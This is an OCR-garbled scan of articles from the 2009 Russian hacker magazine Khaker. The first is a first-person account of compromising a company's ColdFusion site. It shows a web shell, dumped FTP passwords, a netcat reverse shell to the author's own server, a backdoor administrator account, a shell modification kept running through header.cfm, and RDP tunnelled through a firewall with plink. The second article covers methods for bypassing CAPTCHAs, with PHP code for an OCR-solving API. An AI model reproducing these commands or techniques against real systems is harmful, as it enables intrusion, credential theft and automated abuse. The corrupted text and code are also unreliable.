нравится. Так что, ГУГЛI1М на temyWeb-shеll'ов

явно да вала пон>пь, что сайтик не на коленках

[iMISJ. Ну даладно, Я залогинился, пошарил по

и дико облам ывае,~ся. Все ссылки приводят

сварганен, а целая большая и уважаемая контора

сайту и вернулся кда мпу структуры БД - еще же в

К одному И тому же невзрачному кусочку кода,

это чудо написала и бабла срубила. Но об этом

8та5лицах были поля с паролями.

позже. А сейчас на очереди структура БД. На ЭТОМ этапе мне детище Microsoft нравится

который только ко,ынды исполнять и y,~eeT. Ну даладно. сейчас подточим и подпишем, нужно

ГЛАВАз.

лишь матчасть поднять. Некоторое время ушло

уже нетак сильно. Малотого, что разработчики

ИЛИ ДОСТУП ОТКРЫТ

на нереально крутую разработку, после чего

не удосужилисьсделатьнормальныйпейджинг

Следующей привлекла В~lи,~аниетаблица SM_

на свет появились два отпрыска. Первый нас

результатов,так еще и гоw_пumЬегв 2000 сер­

Sites, содержащая колонкус незамысловатым

водитпо дирам и файлы показывает, второй

вере реализовать неуспели. Ждет liасжесткая

названием FТРРаsswогd.Какоказалось,таблица

нас слушает и делает, что мы при каже м.

эротическая прогулка с использованием топовой

содержала 'гакже колонки

Файлы быстро за~IЯЛИ свое законное место. Вско,

конструкции. ТОР - этотакая фишка, которая

FТРSегvег. Слив данные из таблицы,я увидел, что

ре я понял, что владею правами учетки SYSTEM,

позволяет получить первые несколько записей

в качестве серверов использовалисьflQTd.net

а это было нереально круто. Останавлиааться на

позапросу. А воте какой записи начинать. указать

и ftр2лJле\ По адресу гdлеt как раз и хостится

достигнутом было нельзя

ХАКЕР

06/126/09

FTPUserName и

»

83ЛОМ

.•

..

..- - - - - - - - - - - - - - - - - - - - -

"~~,'~.).-с.,,,с~,~~,,!,.а ,~~.!kW;.~

<M~""; WI;.-а·".'.".'t.".'_I~' <.IC[C~<::~!"'~ "'Callc •. H.;.< ......... ".~ ..r .... (cI· - ~ ...~:.r.'cr.b~<~.I..·.. k
... ~" ..... ·v.L"".-rIl;),_Н%.t..... ~·~

..

..... сж".. . .~!>С~ "C.II:'O•• Ht«II>.""c~ _I",:"",' • r.",,::>(1'"

-

<1_ ••

~ •• V~OJ>".'''''1'

•• '1 t .... .юn<

~~."4

bLL.

'1>"'

1,'••"'"

'~IU"1!"Ji

_~

C~Ц~:,;;.~~~~;;~~-;;. ;;~~::~~~~~;.:.;:;:;;;~~:~::::;:~~~~~~~;:' ~~?~:;fo~~.~~~:~'".H.,~_

''''

..1;:10О10.1>

I"cot.DIz:mIIl-....:I

.

~

КОРЕНЬFТРОЧЕНЬНАПОМИНАЕТКОРЕНЬСАМОГО

ПОЧЕМУ НЕ ШИФРОВАЛИСЬ ПАРОЛИ

ГЛАВА 5,

порт3389, и глаза мои радостно заблестели. В шелл посыпаЛlКЬ очень

САЙТА

у

ИЛИ ЧЕРНЫИ БРАТ

ОСТАЛОСЬ ЗАГАДКОЙ

важные и нужные команды.

Web-st1ell- это, конечно, здорово, но вовсе нетакудобl1О,как может показаться.Надо брать быка за рога и получать нормальнуюконсоль. Tolal

net user st

послуwнозабросилпеlсаt на

net localgroup

FTP. На дедике был запущен пеtсаt в режиме

раssvюrd

!add

Аdrпiпistrасоrs st

!add

прослушивания: «пс.ехе -l-p 1234». На зарядку 8 шелле поставлена

кома нда «cmd /с п с.ехе mOrOsuperdedlk.com 1234 -е cmd". Выстрел сделан

Запуск mstsc, тем не менее, жестко обламывал, выдавая сообщение о недо­

- шелл в консоли I Пошарив по файловой системе и запустив сдесяток

ступности хоста. N МАР обламывал еще больше, так ка к открытыми оказались

интересныхутилиток, я принял решение, что Винда без окон - этоэло. В

только во и 25 порты Видимо, хостбыл защищен фае ром и порт3389триви­

99-м году монады еще не появились. ставить что-то было западло, а рулить

ально блокировался. Сдаваться не хотелось, поэтому был быстро составлен

серваком почему-то было вообще никак не удобно Netstat ГlOказал живой

перечень возможных способов получения графического интерфейса:

\mс; РРТР;

Как жt? y(:TpOUT5:

SSiJ.

п_t?ugжuнг?

ГЛАВА 6, ИЛИ ПРИВЕТ, ОКОШ,КИ

Получитьвсе данные из БД за один запрос - мечта любого хакера.

Основная проблема заключалась в организации обратного коннекта на

Но жизнь диктует свои условия и. как правило, взломщик вынужден

нашдедик. Оп ыт С пеtсаl ясно давал понять, что порты блоки руются только

выуживать и нформаци ю строчка за строч кой. Н О вот беда, разработ­

на входящие соединения, поэтому организация обратного коннекта от

чики СУБД решили ситуацию усугубить, причем каждый по-своему

ка кой -нибудь графической системы управления наверняка дала бы

Итак, о схемах пейджинга данных.

1. MySOL. П редлагае, конструкци Ю limit !offset, ] гоwсоuпt. В ыби ра ем гоwсоuпt [в нашем случае

\! строк,

начиная со строки offsel Гениаль­

но, просто молодцы l

РУ';НОЕ'

2. Oracle. Используем псевдостолбец ГОWПLJm Проблема в том, что rOWnLJm

генерируется автоматически,

aBTO!'.·1-'tТU';t?СКОо?

Поискуязвимостей на сайте, в целом, сводится кдвум пунктам.

вить условие типа гоwnшп=n. Такой запрос вернет пустой результоп



инвентаризация СКРИГIТОВ и их параметров,

Без подзапросов здесь не обойтись: select. fieldname frош



фаззинг принимаемых от пользователя данных.

(select

а.

fieldname,

frош tаЫепа.ше)

as

а

rОWnШIl

r from (select. f:Leldname

,.here r=
Решение этих задач,

8 принципе, поддается автоматизации, но на

поверку оказывается, что единственным стоящим сканером явля­

3. SOL Server 2005 Здесь все по стандарту используем row_

еТС9- Ассuпеtiх. Все остальные, в том числе и всюду распиаренный

ПLJmЬег11 Например: selecc fleldl, field2 from (select

X5plder, работают крайне медленно и ПРОl1ускаютогромное коли­

rШ'1_пumЬег()

чество инъекций Кроме того, любой сканер серьезно напрягает

а.

as

,~

и 'iельзя, к примеру, выста­

\·'8

field2 а)

as

over (orderbya.fieldl) asr, a.fieldl,

fгош

(select fieldl, field2

ь ~.here

fгош саЫепате)

сайт, выдавая хакера с потрохами. Зачем же пол ьзоваться ска нера ми, есл и бол ьшую часть ра боты за

r=.

4. SQL Server 2000 А вот здесь все жестко у нас есть только тор.

нас уже сделали ребята из Google. Предоставляя rибкие праВИi1а

Для пейджинга применим такую хитрость' если нам нужно 'Зыбрать

создания запрОСО8, Google позволяет получить структуру сайта на

запись С ыомером offset, мы сначала выберем тор записей с

основе своего индекса, а уж наличие инъекций быстро проверяется

восходящей сортировкой, а уже из полученного результата выберем

вручную Тихо и незаметно. А вот если ничего найти не удалось,

первую запись с нисходящей В результате последняя строка станет

можно прибегнуть и к сканеру. Только мы советуем не пользовать­

первой и ... дело сделано Только ПОМI,И, дЛЯ получения корректного

СЯ платными решениями для ламе ров, а написать собственного

результата сортировать нужно по всем полям в запросе

маленького многопоточного зверька.

050

l

ХАКЕР

06/126/09

» ё

(' Коr1андная

ВЕ:лоtv1

строка - "C:\Documents and Sеttln9s\саdШlп\Рабочии етол\пс.ехе·· ·I-p 1234

рулим СЕРВЕРОМ ПО

RDP -

ЦЕЛЬДОСТИГНУТА

возможность рулить серваком. Естественно, выбор пал на

ный файл rasphone.pbk на взломанныйхаст. Затем созда·

VNC. Схема внедрения VN С, в целом, достаточно проста Iдля

ем командный файл следующегосодержания:

ТightVNC, напримерl:

rasdial connect iоп_паше user 1.

На сервак заливаются I-Jinvnc. ехе и

Wl1l_hooks.

remotehostgateway

d11. 2.

раssиогд

route add 0.0.0.0 mask 0.0.0.0

Устанавливается и запускается V'NC-сервер.

wiпvпс. ехе

Вторая строчка liужнадля восстановлениямаршрута поумол­

На нашем дv.скетебя

пеё еёатё

чанию после подключения,чтобы наш дедик не взял на себя

ждут и сходн И ки

все обязательствапо маршрутизациv.трафика.Запускае~

стогоwеЬ-shеtt'а для

J

сайтов подуправле­

З.

- ins taJ.1

"VNC Ser·vp.r"

На дедике запускается КЛИ"'Н'Г в реЖVlие про­

СJ1ушивания.

батн и к и выпадаем в осадок

4.

СВОИХУLUей, видимо. фаер блокирует исходящие соединения

Осуществляетсяреверс-коннект..

wiпvпс. ехе -соппесt

: <port>.

Соединения "ам не видать, как

n ро­

нием CoLdFusion.

на основе типа протокола В черный список попал и наш GRE­ трафик

у нас почти все схвачено, кроме одной маленькойдетали. а

Отчаяние все сильнее проникало в наши души, но мы не

именно - наличия доступа к рабочему столу. Надежда уми­

сдались. По правде, тупили мы очень долго, таккак надо было

рала, едва успев родиться, тек как шелл у нас был справами

сразу обращаться за помощью к 55Н Это. кстати, очень мощ­

учетной записи 5У5ТЕМ. Не были бы мы хакерами, если

Hый зверь, о чем не раз писалось в::х:. Не только шелл можно

бы не попробовали, но, каки ожидал ось, все попытки шли

получ ить, НО И много других хитрых вещей придумать. Наша

лесом. Был даже испробован Metaspl.oit cwindows/vncinject/

последняя надежда заключалась F! успешной реализации

reverse_tcp нагрузкой Iжуткотормозная вещьi, но и Великий

всеготрех шагов:

Фреймворк не помог. Принци п внедрения VNC на се рвер

Для автоматизации

посредством неинтера кти вного шелла и В условиях отсутствия

заrtУСТИТЬ

на дедvпсе

доступа к рабочему столу остался неведом На самом деле, я

залить

даже обрадовался -зачем HaMVNC, если есть RDP. Надо толь­

подкш,читься

поиска уязвимостей

SSH-сервер

на узел SSН-кпиент

можешь воспользо­

и создать нужный маппинг портов

ко прабиться через фаер.

ваться следующими продуктами:

Гениальная мысль с РРТР заключается в создании

я многое могу пон!пь. но, например, поче~у в Винде в

РРТР-соединения до нашего дедика -

XXI

и в дальнейшем

веке до си х пор нет встрое н н О го 55 Н-сер вера, м н е

• асuпеtiх.СОГП/ \/u lnec.a_b.ili1.y.-scan пег/

обращении к узлу по внутренней адресации с туннели·

неведомо. Ну да ладно, ставим любой, благо их довольно

-

рованием трафика сквозь фаер. В Винде все соединения

много. В качестве клиента, естественно. используется

vuLпегаыltуy 5саппег.

настраиваютс\\ графически, но должен быть способ работы

любимый putty. Нотолько putty не простой, а волшебный.

• ptsecurity,l'u/xs 7.asp

из консоли. Запускаем на тестовой машине ргосгпоп от

Если помнишь, при обращении к новому узлу рuttучестно

- Xspider.

Руссиновича и мониторим реестр в момент вызова клиента

предлагаетсохранитьсигнатуру в кзше. Доступ К команд­

• cirt,net/nikt.02­

подключения к сети. Результат не поддается разумному

ной строке у нас Иlперактивностьюне отличается, и ничего

Nikto.

мы ответить на ЭТОТ вопрос попросту не сможем. Значит,

• ;;еПlliоs t .СОГП/ research/v,ikto ­

обьяснению, ходит.

ничего интересного с реестром не проис·

MicrosoFt сама

себя превзошла. Стоило создавать

надо, чтобы отпечаток сохранялся автоматически,а

putty

реестр, если собственные же модули им не пользуются,

этого не умеет. Немного погуглие, мы нашли Quest РиТТУ

Пусть подумают на досуге, а мы, тем временем, нашли

О.60_цl.129. Все то же самое, плюс то, что нам нужно'

«телефонную кни гу» ПО адресу С:\Оосuгпепts апd 5etti пgs\

Заливаем plink.exe на cep~aK и исполняем команду:

Ассuпеtiх WеЬ

Wikto.

АН Users\Appli саtioП Oata\Mi cГ'Osoft\Network\Con nections\

Pbk\rasphone.pbk, в которой, собственно, и описываются

pJ.ink.exe

параметры подключения к Oial·up и VРN-сетям. Создае~~

-р"',

подключение К дедику [с уста новленной И настроенной

3390: 127.

службой RRA5] на тестовой машине и копируем получан­

cache mOrOsuperdedik

ХАКЕР

0& 11261 09

-nс

mOrOsuperdedik.com:22 -oatcl1

password -R 3390: 127. О. 0.1: 3389 -L О.

0.1: 3390 -1 st

-аutо_stоrе_kеу_iп_

~

051

»

В3ЛОМ

~'"';Win55HD 5.05 Control Panel

~ОО13 Sertd

Sessions

5erver

щ;

feedback...

Sessions overview The following sessions ауе currently active оп WinS5HD. Click[+] to expand а sessitln and see the 5SH channeJs it is using.

­

Blocked IPs: О

Sessions: 1

I

Id в

1001

View bIocked IPs...

Remote Ip

Remote port

Connect time

Client version

Account type

204.153.45.116

1318

00:07:32

5SH-2.0·РuТРо'_...

\/·ШJDО\oIJS

:.. ,. Open time: 00:07:N, Туре: forwarded-tcpip, Буtеs received: 2 760148, Bytes sent: 21 202 :.... Open tIme: 00:07:29, Туре: direcHcpip) Буtеs received: О, Буtеs sent: 287

ФАЕР ПОБЕЖДЕН

- КАНАЛ ПОЛУЧЕН

~O--"'

• :1)(о.о,с

*"'

__

.

, , " _ ~

. с' Х .... ,tj,,,-,,"--'-J~~_,'-f-"';OIIfLoOO: • _ _• __ ~

I'#lk.. • •

.>_-0_."

Q_·t.CooO_·~CI~·C;_·

Tne web slte you 3ГЕ!

!d­ _

acces::sing has expenenr..ed аn ,

,

unю;~~ttЮ e:rror.

method=" POST" >

< tr>

годарный процесс.

Имя попьзовате"я:
type="text"

паmе="роrt." vаluе="22">
Присмотриськ средс­

type="text" size="20" name="login"

теам автоматизации

vallle=

[или разработайсвой

< tr>< td> Т1ароль:
продукт]. например

size= "20/1

SIPT

ИМХО, прога

часто глючит, работа·

разработчика на ача­

Теперьзапускаем mstsси коннеКI'ИМСЯ на localhost:3390. Нашему

1-10.ht.lJJ.!.

взорупреДСlclет окно входа Windows 2000. Вводи,пуда данные до­ бавленногоспомощью«пеtusегадминистратора»и

наслаждаемся

"

passv.lord" >< /



ЭПИЛОГ, ИЛИ ВСЕ ТОЛЬКО НАЧИНАЕТСЯ

графикой справамиадминистратера. Ура. можно хлебнуть настоя­

Когда был найден са йт разработчика CMS, руки горели про­

щего рок -н-рольного пойла. то есть виски. и отпраздноватьуспех.

веритьего на прочность Ошибка 8СМSбыла натомже месте.

SM_Sltes содержала

одну единственную

ГЛАВА 7, ИЛИ ДАЕШЬ АВТОМАТИЗАЦИЮ

пустую запись, и мечты об FТP не осущеСТ8ИЛИСЬ. Пароли

На первый взгляд. все за мечательно. но каждый раз заходить

IMIS [длина 120 бит] Возиться былоуже неохота. так что мы

на

решили оставить это тебе. Ну а чтобы был стимул, вбей в Google

были зашифрованы, и. судя по 13сему. тем самым зловещи,;

web-shel! и запускать команду на подкл ючен ие по SSH

на следующий день стало спишком утомительным

Поэтому

наикрутейший Со(dFUSlOп-шелл был немного ,;одифицирован

Iпuгl'паvltеmNumЬег

- 12000 записей

будут манить тебя и

ВДОХНО8лятьна подвиги. Доводи любое дело до конца,

для исполнения команды подключения без участия человека.

каким бы нереальным это ни казалось. иначе любое твое.

Код модификации шелла смотри на нашем

начинание лишено смысла. Все описанные действия

DVD.

Кусок кода был заныкан в файл hеаdег.сfm. который, в свою

совершены под музыку Брамса \спасибо «_xCort_" с

очередь, подключается кбольшинствуфаЙЛ08

tОГГ'епts rul. Перефразируя слова бессменного ведущего

CMS. Далее

создаем простую форму. указы вающую на любой

* сfm-файл

на серваке. и получае,; простой способ организации

052

Суре'··" сехс

Г-.дще= l1password" 'ra1ue=·~ 11

Вополько таблица

~

/ tr> inptlt

IP-адрес

"'.

E/I"OI~е-::.~'N·~r-:-.~'":Y,IР"4>О:;t

~


уэла для туннелироаания:

info

"al ие= "mOrOsuperdedik. сош'»

Получение инфы из

Порт SSH:
БД вручную -утоми­

size="20"

тельный и небла­

td>
Смmpим В консолиSSН-сервераидикорадуемся- есть коннект l

neUthreadnav24918­

[д><

со><сд><

value="GO!">

ется. Читай веткуот fогum.апtiсhаt

">< /

< /t:d>
сзадачейсправля­

-

"вс

input>c/tr>

А ВОТ И ПОЛЬЗОВАТЕЛИ

етоднопоточно,НО

те


td>
RDP.

программы «Дым под водой» Кирилла Немоляева' «Слу­ шайте классику и будьте счастливы!».:Х:

ХАКЕР

06 /126/ 09

СОВМЕСТНАЯ АКЦИЯ ЖУРНАЛА «ХАКЕР» и «КАНЪ

партнеры акции

, Or<1ng e С

Fitness

Сеть профеосионапьных спортивных магазинов КАНТ

.

~////л х

S4AVROOW 1 [email protected] 1

О

СМОТРИМ

ВЗЛОМ САРТСНА-ФИЛЬТРОВ Фил ьтры c_aptcha получ ил и широкое расп ространен ие и повсемест­ но используются в многочисленных интернет-сервисах. Но не все

сарtсhа-фильтры одинаковы полезны. Многие из существующих реа­ лизаций себя не оправдывают, а лишь раздражают своим присутстви­

ем обычных пользователей. О недостатках применения сарtсhа-филь­ тров и поидет речь



.

САРТСНА (Сот pletely Auto та ted PlJblic Т uri ng

интеллекта и философии, а в наше время еще

Условно все способы можно разделить на

test to tell Computers and Humans Apart, в про­

и нашла применениев борьбе с а8томатизи­

уязвимости в реализации и фундаментальные

стонародье - «капча»I- полностью автомати­

рованным программнымобеспечением

недостатки самой концепции применения

зированный публичный тест Т ьюринга для оп­

В наиболее распространенномварианте

сарtсhа-фильтров. К уязвимостям реализации

ределения компьютеров и людей, В основном

испол ьзова н и я са ptcha- фильтров требуется

относятся следующие распространенные

используется, когда необходимо предотвратить

ввести символы, как правило, изображен­

проблемы

выполнение каких-либо автоматизированных

ные на предлагаемом рисунке в искаженном

I,А8томатизированноераспознавание.Ав­

действий в отнашении инт~рнет-сервисов,

виде и обычно - сдобавлением некоторого

томатизированное

8

«шума». Могут также применяться другие

задача OCR (оптическое распознавание сим­

ческих отправок сообщ~ний, регистраций,

ПЛОХО алгоритмизуемые задачи, основанные

воловl- зто одна из самых острых проблем

проведения атак типа подбор пароля и т.п.

на логике мышления человека, например:

применения captcha-фИЛЬТР08.Дело втом,

Понятие Теста Тыоринга было введено Аланом

указать, что изображено на картинке; ввести

что во многих случаях существуетвозмож­

М. Т ьюрингом

все символы, которые соприкасаются с чем-то

ность автоматизированного

(вспоминай кошек на rapldsharel и пр. Как

текста, нанесенного на изображение. Тотже

лить, обладает ли компьютерная программа

альтернативз картинкам могут применяться

Adobe Fine Rеаdегс успехом может распоз­

интеллектаl'" или, точнее, может ли она вы­

капчи, основанные на распознаванииречи.

на8ать слабые реализации captcha [смотри

давать себя за человека. Критерий Тыоринга

Встречаютсятакже капчи, где предлагается

скриншотыl. Различного рода искажения с

описан в виде игры "Имитация». Берется

ввести ответ на простое арифметическое

добавлением шумов на изображение способ­

один мужчина. одна женщина и программа,

деikтвие (90 + 72 =

частности, для предотвращения автомати­

[1912-19541 в работе "Игра в

имитацию». Задача та кого теста

-

опреде­

которая, не Иf~ея информации о половой при­ Н'адлежности участн иков, задает им вопросы.

Ее цель

- определить ПОЛ людей. Несмотря

?I.

распознавание

капчи или

распозна взния

ны лишь с некоторым лроцентом успешности

воспрепятствовать этому. Ведь чем более ис­

ПРАКТИКА ОБХОДА

CApteHA-ФИЛЫРО8

кажена информация на изображении дЛЯ 8ВО­ да, тем больше проблем возникает у конечного

на критику этой теории, она внесла большой

Сегодня ИЗ8естно достаточно много способов

пользователя. Разработчикам фильтров при­

вклад в развитие систем искусственного

обхода различного рода сарtсhа-фильтров

ходится находить некий компромисс между

~

054

ХАКЕР

06 /1261 09

>> 6::лоtv1

около

20 секунд

В подобныхусловиях на

твердую «четверку» мог отработать вектор по

макси­ мальным

искажеl-iием

перебору паролей к аккаунтам исследуемой

Или более простой случай -

системы .. если бы не одно «НО». Ограничения

I-ie используются

проекта САРТСНА ПОЗl-iавать более использовании

Killer не

20

позволяют рас­

одного аккаунта в их системе.

-

если ДЛА картинок

раЗЛИЧI-iОГО рода искажения

и добавление шума Тогда просто сверяются

изображений в сутки при

Ключевое слово тут

Иl-iформации и

капчу осуществляется путем сравнения степе­ ни похожести с имеющимися экземплярами.

«одного». На сайте про­

контрольные суммы, и становится поНятно, с каким паРНОКОПЫТI-iЫМ

3. Уязвимости

мы имеем дело.

при передаче значения капчи

екта существует баг, позволяющий регистри­

в брауэер пользователя_ Какустанавлива­

ровать неограl-iиченное количество пользова­

ется соответствие междузначением капчи и

приемлемое количество попыток.

телей. При всем уважении к проекту (на сайте

генерируемой картинкой? Многие разработчики

На фоне подобного l-iеАОСтатка появилось

даже было замечено использование защиты

сарtсhа-фильтров почему-то полагают, что

несколько проектов по практическойде­

от

монстрациизадач

поводу разработки стойкой капчи, а просто

лучше передавать в браузер пользователя эави­

просят при регистрации

симоезначение от генерируемой капчи (хеш от

способностьюпользова­ теля прочитать и ввести значеl-iие за

тные ю них Visiоп Group,

это

OCR. Наиболее извес­ UC Berkeley Computer

PWNtcha

и САРТСНА

Klller.

CSRF)

авторы не стали заморачиваться по

нового пользователя

сложить два числа, которые попадают в сырой

генери руемого значен ияl. И впоследствии осу­

Ваш ПОКОРI-iЫЙ слуга, выполняя пентест

HTML-KOA. ДЛЯ

OAI-iОГО банковскогоwеЬ-приложения,

лишь самого вектора, ноты '10жешь восполь­

порой передача осуществляется G виде откры­

зоваться этим недостатком,

того текста [то есть Зl-iачение капчи передается,

ВОЗМОЖI-iОСТЬ

познакомиться

имел

с последним

более близко.

,юик целей достаточно было

вместо некоторого Bl-iутреннего идентификатора

пра вда, думаю,

баг довольно быстро прикроют

Проект САРТСНА

Killer заинтересовал,

пре­

ществлять проверку по зтому значению. Приче'1,

например, какзначение скрытого параметра

Чтобы убедиться в эффективности

OCR

фОР'1 ы! или существует ВОЗМОЖI-iОСТЬ обратимого

в по­

жде всего, тем, что работа с ним основана

левых УСЛОВИАХ, Я провел небольшое исследо­

шифрования передаваемого значения.

на использовании

вание в отношении таких сервисов, как Уапdех

Иногда реализуемы и более изощренные

API,

и есть возможность

легкого встраивания функции по автомати­

зированному взлону капчи в собственные

приложеl-iИЯ. На РНР это выглядит ПрИ'1ер­

но та кс

«ПРОЕIКТ САРТСНА IKI LLER ЗАИ НТЕРЕСО­ ВАЛ ТЕМ, ЧТО РАБОТА С НИМ ОСНОВАНА

//

l1ереда.ем

каnч:у на анализ

$f ields = array·( api_key' =>

I

$api_key, 'method' => 'uploa.d_

captcha',

I

ca.ptс11Э_:"lr1

r

=>

'http://Eon./ ') ;

$fi1es =

аггау(ап~ау( 'пате'

=> 'fiJ.e', 'type' => 'image/ j peg' , ' Ei J.e' => $hash. ' . j pg' ) ) ; $геБРОnБе

message

= http_parse_

{11 ttp_pos

t_f i

е

/;

НОСТЬЛЕГКОГО ВСТРАИВАНИЯ ФУНКЦИИ ПОАВТОМАТИЗИРОВАННОМУВЗЛОМУ

КАПЧИ В СОБСТВЕННЫЕ ПРИЛОЖЕНИЯ».

J.ds ( "h t tp: / /

,,,,w\.,. captchaki lJ.ey. сот/ api $fie1.ds,

НАИСПОЛЬЗОВАНИИАРI И ЕСТЬ ВОЗМОЖ­

. pllP" ,

$fiJ.es))->Ьоdу;

i!{ДЕ~4 результата анализа изобра-­

жеЕ-iИЯ

Sfie1.ds = array ( 'api_key' =>

и

Google. Все

генер"руемые капчи на ресурсе

атаки, направленныена эксплуатациюподоб­

Уапdех распозна ются без особых усил и й. Для

I-iОГО типа уязвимости.Для ПРИ'1ера возьмем

Google вектор

следующий код, с которым мне довелось

атаки по распознаванию капчи

выглядит менее впечатляюще: удается распоз­

встретиться при аудите одного крупного

нать только

интернет-сервиса:

20% генерируемых

изображений.

Но и этого более чем достаточно, например, для

$api_key, 'met1106, => 'get_

автоматической регистрации новых ящиков

resuJ.t', 'captcha_id' => $captcha_

злектронной ПОЧТЫ.Аесли учесть, что работать

тУ

id) ;

'10ЖНО в несколько потоков ... Другое дело, что

шу @БуrnЬо1. s

при такой скорости особо не побрутфорсишь,

for ( 1.,,5 ) (

$геsропsе =

ht ::p_parse_

message (rlt tp_pos t_fieJ.ds ( "ht tp: / / WW"'.

captcnaki 1.1. er.

сот/ dPl •

p11p" ,

но, как говорится,

I-ie



все же коту масленица

= (, О ' , , ' 9 ' ) ;

. = $symbo1.s [raod @symboJ.sl;

2.0граниченное количество вариантов изоб­ ражений. Самый яркий пример

$fie1.ds, $files) )->body;

$key = int (rand 10000);

-

это капчи с

изображениями различной ЖиВI-iОСТИ Недо­

ту

$hasll

sha1._hex { uc

($ч),

$key

) ;

статок подобного подхода кроется в том, что

Работа с проектом показала высокую зф­

количество известных оБЫЧН0f1У обывателю

фективность - порядка

животных, птиц и прочих существ ограниче­

80%

генерируемых

Что тут не так? Ограниченный l-ia60p сим­

изображений было распознано безупреч­

НО,а это позволяетсформироватьбаэу всех

волов пр" генерации капчи, слабая «соль»

но. Ограниченный набор генерируе'1ЫХ на

возможных вариаци й ка РТИI-iОК.

[salt] и. как следствие - небольшая энтропия

изображекияхсимволов[использование

Эксплуатируется вектор достаточно прос­

возможныхзначениЙхеша.Ахеш, всвою

только верхнего регистраl позвол"л повысить

то Сначала собираются картинки со всеми

очередь. передается в 6раузер пользователя.

зффективность вектора атаки еще на

10%.

доступными изображениями животных. И в

На анализ одного изображения тратил ось

зависимости от реализации системы, атака

ХАКЕР О6 112М

09

Все это позволяет сформировать заранее

cra

подготовленные табл ицы соответствия хеша

~

055

ПРИМЕРЫ УЯЗВИМЫХ КАПЧ ДЛЯ АВТОМАТИЗИРОВАННОГО РАСПОЗНАВАНИЯ

FLAG

CA"•• S ( ! ! Н:О

11111 [

rr н;: 11

tI t I J J

ПРИМЕРЫ САРТСНА, коТОРЫЕ БЫЛИ РАСПОЗНАНЫ СОТРУДНИКАМИ ИНПИТУТАБЕРКЛИ

к генерируемому значению капчи [rainbow

tablesl. С подобными таблицами любой запрос

3 min 56 sec

сарtсhа-фильтра уже не будет преп~тствием дл~ програм,mого бота, прогуливающегося по

300

200х70

у~звимомуресурсу

4.Возможноеть повторного ИСПОЛЬЗ0ва­ ни~ Это типичная у~звимоеть не только для

сарlсhа-фильтров. но и для web-приложений в

RESULT: intгebec РАСПОЗНАВАНИЕ КАПЧИ GOOGLE СРЕДСТВАМИ САРТСНА КlLLER

цело,~. Уязвимость включает в себя следую­ щи е недостатки'

• Использование идентификатора сессии без ввода капчи



.

повторное использование ЗI,ачения капчи

Эксплуатация первого недостатка за кл юча­ ется в TO'~. что человеком вводится значение

caplcha

при прохождении аутентификации

в приложении. После чего боту передаетс~

ДАЖЕ ТАКИЕ КАПЧИ УЯЗВИМЫ

KOCR

значение идентификаторасессии web-при­

ложения [например. cookiesJ И когда при­

капчи и его идентификатора

ложением не осуществл~етс~ мониторинг

ся возможным бесп реп~тственно обходить

генератора капч и. а второй

действий авторизованного пользователя.

сарtсhа-фильтр Во втором случае проблема

перебор по постоянно'~у диапазону значений

бот сможет беспреп~тетвенно выполнять

возникает. когда допускаетс~ долгосрочное

[вспоминай теорию вероятности и поймешь.

свои фУf;КЦИИ.

хранение сгенерированных, но никем

Повторное использование значения капчи

испол ьзованных значений сарtсhа-фильтра,

диапазон значений). в ситуации. когда набор

встречается в двух случаях. В первом

и становит­

I.,e

щеетвляетбесконеЧI'lыеобращени~ к модулю

-

осуществляет

почему надо использоВать «постоянный"

и при этом отсутствует какая-либо привязка К

символов при генерации значения капчи

производится очистка использованных

идентифи катору капчи при проверке его зна­

ограничен [используются, например, только

значений капчи. введен ных пол ьзовател~ми.

чения, ЭТО поз.волястпроводить вектор аlаки

цифрыl. вектор атаки может быть достаточно

Достаточно получить одно верное значение

типа брутфорс. Например. один поток осу­

эффективным!

~

056

- не

-

ХАКЕР

06 /126/ 09

>> взлоt-tt

ПРИМЕРСТОЙКОЙ КАПЧИ KOCR



Оптическое распоз­

навание с!'!мволов

-

это одна из самых

острых п робл е м пр!'!менения

captcha­

фильтров.



ПРИМЕРУЯЗВИМЫХКАПЧ СЖИВНОСТЬЮ

С использованием можно легко

ИСПОЛЬ30ВАНИЕЧЕЛОВЕЧЕСКОГО

OCR

РЕСУРСАДЛЯОБХОДАСАРТСНА-ФИЛЬ­ ТРОВ

оБХОАИТЬ текущие ре­

ализации САРТСНА натакихресурсах,

как

Уапdех. Google и АР. 5.Взлом капчи, за счет эксплуатации ДРУГИ'Х уяэ­

Идея использованиячеловеческогоресурса в общем

в'имостей Web. Ни Аля кого не секрет, чтозначенl'Я

ВИАе ВЫГЛЯАиттак.СОЗАаеТСА некиV. ресурс, Аля которого

• "МеТОАлеммингоl3"

капчи в основном хранятся в БД, с которым работает

предпопагаетсявысокая посещаемость.Таким ресурсом

ста вит под сомнение

web-приложение. Если приложение содержит уязви­

обычно стаНОВИТСR бесплатный порно-сайт, на котором

эффе кти В Н ость са­

мость, позволяющую при эксппуатации дотянуться до

пользователю предпагается ввести значение капчи в

мого ИСПОЛЬЗ0ваНИR

хранимых значений captcha, задача по оБХОАУ ее BBOA<J

обмен на просмотр желаемого ропика, Кроме порно-ресур­

са ptcha -фильтров.

будет СВОДИТЬСЯ к простой выборке нужных значений из

сов, Аля реализаци!'! ПОАобных целей замечательноПОАОЙ­

соответствующей таблицы БД Например, это реалиэуе­

дет крупная СОЦ!'!альнаясеть. Однако до сих пор социаль­

~,o ПРИ эксплуатации уязвимости типа

SOL InjectlOn.

На

ные сети используются искпючительнодля распознавания

практике мне встречались подобные приложения, В

капчи в благих целях Это проектRеСАРТСНА,признанный

свое время даже был забавный случай, когда обследуе­

помочь в оц!'!фровкетрудно распознавае,щготекста книг

мое web-приложениесодержало вроде бы безобИАНУЮ

Проект запущен в таких социальныхсетях, как Facebook.

уязви~,ость типа пистинг Аиректорий В пространстве

Bash.org ru и АР

корневой АИ ре пори и

we Ь-сервера распола гап!'!с Ь

генерируемые VrЭображения капчи, а в

V·MeHax

файлов

ВМЕСТО ЗАКЛЮЧЕНИЯ

• ~a cSJ.· <-щ,..lli:9L'юh1L

СОАержал!'!сь!'!х значенv,я. Безусловно, Э1'О единичный

Надежностьлюбойсистемы безопасности в значительной

РWNt<jш

случай, но с учетом повсеместных уязвимостей типа

степени зависит от качества ее реализации. У практи­

• captchakiller.com

ческ!'!х решений есть свои недостатки. которые могут

• !2.~с_u.гitуlаЬ.г_ш'

обхода ВВОАа капчи Другое дело, будет ли зто 80стре­

быть использованы злоумышленниками В полной мере

соп test!239642,phQ.

бованным в случае, когда приложен!'!е содержит такие

это правило применимо и к системам, использующим

грубые ошибк!'!.

САРТСНА. Поэтому Ааже в очень правильной реализации

К ФУI<Ааментальным проблемам использования captcl1a­

сарtсhа-фильтра испольЗован!'!е только его ОАНОГО может

фильтров ОТНОСИТСЯ воэможность использоваНИА челове­
